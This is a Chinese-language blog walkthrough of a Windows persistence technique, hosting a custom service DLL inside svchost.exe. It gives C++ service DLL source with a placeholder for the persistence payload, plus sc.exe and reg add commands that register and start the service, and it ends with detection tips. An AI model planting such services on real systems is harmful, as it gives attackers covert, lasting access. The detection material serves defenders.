svchost.exe挂载DLL

  1. 工作原理
  2. 实验过程

工作原理

实验过程

vs新建类库编译个处理服务循环响用的DLL

#include "pch.h"
#define SVCNAME TEXT("EvilSvc")


SERVICE_STATUS serviceStatus;
SERVICE_STATUS_HANDLE serviceStatusHandle;
HANDLE stopEvent = NULL;


VOID UpdateServiceStatus(DWORD currentState)
{
    serviceStatus.dwCurrentState = currentState;
    SetServiceStatus(serviceStatusHandle, &serviceStatus);
}


DWORD ServiceHandler(DWORD controlCode, DWORD eventType, LPVOID eventData, LPVOID context)
{
    switch (controlCode)
    {
        case SERVICE_CONTROL_STOP:
            serviceStatus.dwCurrentState = SERVICE_STOPPED;
            SetEvent(stopEvent);
            break;
        case SERVICE_CONTROL_SHUTDOWN:
            serviceStatus.dwCurrentState = SERVICE_STOPPED;
            SetEvent(stopEvent);
            break;
        case SERVICE_CONTROL_PAUSE:
            serviceStatus.dwCurrentState = SERVICE_PAUSED;
            break;
        case SERVICE_CONTROL_CONTINUE:
            serviceStatus.dwCurrentState = SERVICE_RUNNING;
            break;
        case SERVICE_CONTROL_INTERROGATE:
            break;
        default:
            break;
    }


    UpdateServiceStatus(SERVICE_RUNNING);


    return NO_ERROR;
}


VOID ExecuteServiceCode()
{
    stopEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
    UpdateServiceStatus(SERVICE_RUNNING);


    // #####################################
    // your persistence code here
    // #####################################


    while (1)
    {
        WaitForSingleObject(stopEvent, INFINITE);
        UpdateServiceStatus(SERVICE_STOPPED);
        return;
    }
}


extern "C" __declspec(dllexport) VOID WINAPI ServiceMain(DWORD argC, LPWSTR * argV)
{
    serviceStatusHandle = RegisterServiceCtrlHandler(SVCNAME, (LPHANDLER_FUNCTION)ServiceHandler);


    serviceStatus.dwServiceType = SERVICE_WIN32_SHARE_PROCESS;
    serviceStatus.dwServiceSpecificExitCode = 0;


    UpdateServiceStatus(SERVICE_START_PENDING);
    ExecuteServiceCode();
}

创建EvilSvc服务

sc.exe create EvilSvc binPath= "c:\windows\System32\svchost.exe -k DcomLaunch" type= share start= auto

修改EvilSvc DLL路径为自己的DLL路径

reg add HKLM\SYSTEM\CurrentControlSet\services\EvilSvc\Parameters /v ServiceDll /t REG_EXPAND_SZ /d C:\Windows\system32\EvilSvc.dll /f

注册表查看该服务如下

修改svchost组里的DcomLaunch
(添加创建的服务名)

启动EvilSvc服务

sc start EvilSvc

检测技术

* 最近创建的服务svchost.exe作为binPath
* 列出所有系统服务的ServiceDLL值并检测
Get-ItemProperty hklm:\SYSTEM\ControlSet001\Services\*\Parameters | ? { $_.servicedll } | select psparentpath, servicedll


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:svchost.exe挂载DLL

本文作者:九世

发布时间:2022-01-16, 01:28:39

最后更新:2022-01-16, 01:36:01

原始链接:http://422926799.github.io/posts/3047149d.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录